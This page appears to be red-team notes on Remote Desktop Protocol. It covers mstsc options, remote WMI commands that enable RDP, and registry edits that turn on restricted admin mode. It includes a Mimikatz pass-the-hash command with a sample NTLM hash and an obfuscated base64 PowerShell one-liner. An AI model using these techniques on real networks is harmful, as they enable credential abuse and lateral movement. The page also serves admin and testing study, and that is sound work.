# Remote Desktop Protocol (RDP)

## Overview

> RDP (Remote Desktop Protocol) is a network communications protocol developed by Microsoft, which allows users to connect to another computer from a remote location.

## Using mstsc

To connect to a session in full-screen mode, type:

```powershell
mstsc /v:computer1 /f
```

## Using /admin and /restrictedAdmin

{% hint style="info" %}
Connecting to a workstation with Remote Desktop will disconnect any existing session. The /admin flag allows us to connect to the *admin* session, which does not disconnect the current user if we perform the login with the same user.
{% endhint %}

Connects you to a session for administering the server.

```powershell
mstsc /v:computer1 /f /admin
```

{% hint style="info" %}
Connecting to a workstation with /restrictedAdmin won't send your credentials to the remote PC, which can protect you if you connect to a compromised device. Connections made from the remote PC might not be authenticated by other PCs, which impacts application functionality and compatibility. The **/admin** parameter is implied.

Microsoft introduced RDP with *restricted admin mode*, which allows system administrators to perform a *network login* with RDP. When we supply this argument, the current login session is used to authenticate the session.
{% endhint %}

{% hint style="warning" %}
Restricted admin mode is disabled by default.

We can enable it through the `DisableRestrictedAdmin` value under the following registry key:

```
HKLM:\System\CurrentControlSet\Control\Lsa
```

{% endhint %}

## Command examples

### RDP management through WMI

#### Checking if RDP is allowed

{% hint style="info" %}
AllowTSConnections (0 – disable, 1 – enable)
{% endhint %}

{% code overflow="wrap" %}

```powershell
$tsobj = Get-WmiObject -Class Win32_TerminalServiceSetting -Namespace Root\CimV2\TerminalServices -ComputerName SERVER01 -Credential $creds
$tsobj.AllowTSConnections
```

{% endcode %}
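The WMI check above and the `DisableRestrictedAdmin` registry value described earlier can be combined into a single audit. The following is an added example, not code from the original page; it assumes the WMI classes already used on this page, reads the registry remotely through the `StdRegProv` WMI provider, and that the caller has admin rights on the target host.

```powershell
# Added audit example (not from the original page). Assumes the WMI classes used
# above, the StdRegProv provider for remote registry reads, and admin rights.
function Get-RdpPosture {
    param(
        [string]$ComputerName = $env:COMPUTERNAME,
        [pscredential]$Credential
    )
    $common = @{ ComputerName = $ComputerName }
    if ($Credential) { $common.Credential = $Credential }

    # Is RDP enabled at all? (AllowTSConnections: 0 = disabled, 1 = enabled)
    $ts = Get-WmiObject -Class Win32_TerminalServiceSetting -Namespace Root\CimV2\TerminalServices @common
    # Per-listener settings for RDP-Tcp: NLA requirement and security layer
    $gen = Get-WmiObject -Class Win32_TSGeneralSetting -Namespace Root\CimV2\TerminalServices -Filter "TerminalName='RDP-Tcp'" @common

    # Read DisableRestrictedAdmin via StdRegProv (HKLM = 0x80000002).
    # 0 = restricted admin mode enabled; 1 or a missing value = disabled (the default).
    $reg = Get-WmiObject -List -Class StdRegProv -Namespace root\default @common
    $res = $reg.GetDWORDValue([uint32]2147483650, 'System\CurrentControlSet\Control\Lsa', 'DisableRestrictedAdmin')
    $raValue = if ($res.ReturnValue -eq 0) { $res.uValue } else { $null }

    [pscustomobject]@{
        ComputerName           = $ComputerName
        RdpEnabled             = [bool]$ts.AllowTSConnections
        NlaRequired            = [bool]$gen.UserAuthenticationRequired
        SecurityLayer          = if ($gen) { @('RDP', 'Negotiate', 'TLS')[[int]$gen.SecurityLayer] } else { $null }
        DisableRestrictedAdmin = $raValue
        RestrictedAdminEnabled = ($null -ne $raValue -and $raValue -eq 0)
    }
}

# Usage against the host used in the examples above
Get-RdpPosture -ComputerName SERVER01 -Credential $creds | Format-List
```

A host reporting `RdpEnabled = True` with `NlaRequired = False` or `SecurityLayer = RDP` is the one to prioritise for hardening, since it accepts connections before authentication and without TLS.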

#### Enabling AllowTSConnections (RDP) through WMI

{% code overflow="wrap" %}

```powershell
$tsobj = Get-WmiObject -Class Win32_TerminalServiceSetting -Namespace Root\CimV2\TerminalServices -ComputerName SERVER01
$tsobj.SetAllowTSConnections(1,1)
```

{% endcode %}

#### Disabling AllowTSConnections (RDP) through WMI

{% code overflow="wrap" %}

```powershell
$tsobj = Get-WmiObject -Class Win32_TerminalServiceSetting -Namespace Root\CimV2\TerminalServices -ComputerName SERVER01
$tsobj.SetAllowTSConnections(0,0)
```

{% endcode %}

### Restricted admin

#### Using restricted admin to perform pass the hash

{% code overflow="wrap" %}

```powershell
sekurlsa::pth /user:admin /domain:corp1 /ntlm:2892D26CDF84D7A70E2EB3B9F05C425E /run:"mstsc.exe /restrictedadmin"
```

{% endcode %}

#### Disabling restricted admin through the registry

{% code overflow="wrap" %}

```powershell
Remove-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name DisableRestrictedAdmin
```

{% endcode %}

#### Enabling restricted admin through the registry

{% code overflow="wrap" %}

```powershell
New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name DisableRestrictedAdmin -Value 0
```

{% endcode %}

Base64 encoded:

{% code overflow="wrap" %}

```powershell
powershell -enc TgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgAEgASwBMAE0AOgBcAFMAeQBzAHQAZQBtAFwAQwB1AHIAcgBlAG4AdABDAG8AbgB0AHIAbwBsAFMAZQB0AFwAQwBvAG4AdAByAG8AbABcAEwAcwBhACAALQBOAGEAbQBlACAARABpAHMAYQBiAGwAZQBSAGUAcwB0AHIAaQBjAHQAZQBkAEEAZABtAGkAbgAgAC0AVgBhAGwAdQBlACAAMAA=
```

{% endcode %}

## References

{% embed url="https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/mstsc" %}
